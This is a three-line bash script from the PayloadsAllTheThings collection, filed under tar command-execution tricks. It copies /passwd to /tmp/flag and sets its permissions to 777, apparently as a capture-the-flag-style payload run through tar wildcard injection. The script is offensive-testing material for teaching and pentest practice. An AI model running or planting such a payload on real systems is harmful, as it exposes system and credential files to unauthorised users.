PayloadsAllTheThings/Tar commands execution/Files/shell.sh

3 lines
57 B
Bash

#!/bin/bash
cat /passwd > /tmp/flag
chmod 777 /tmp/flag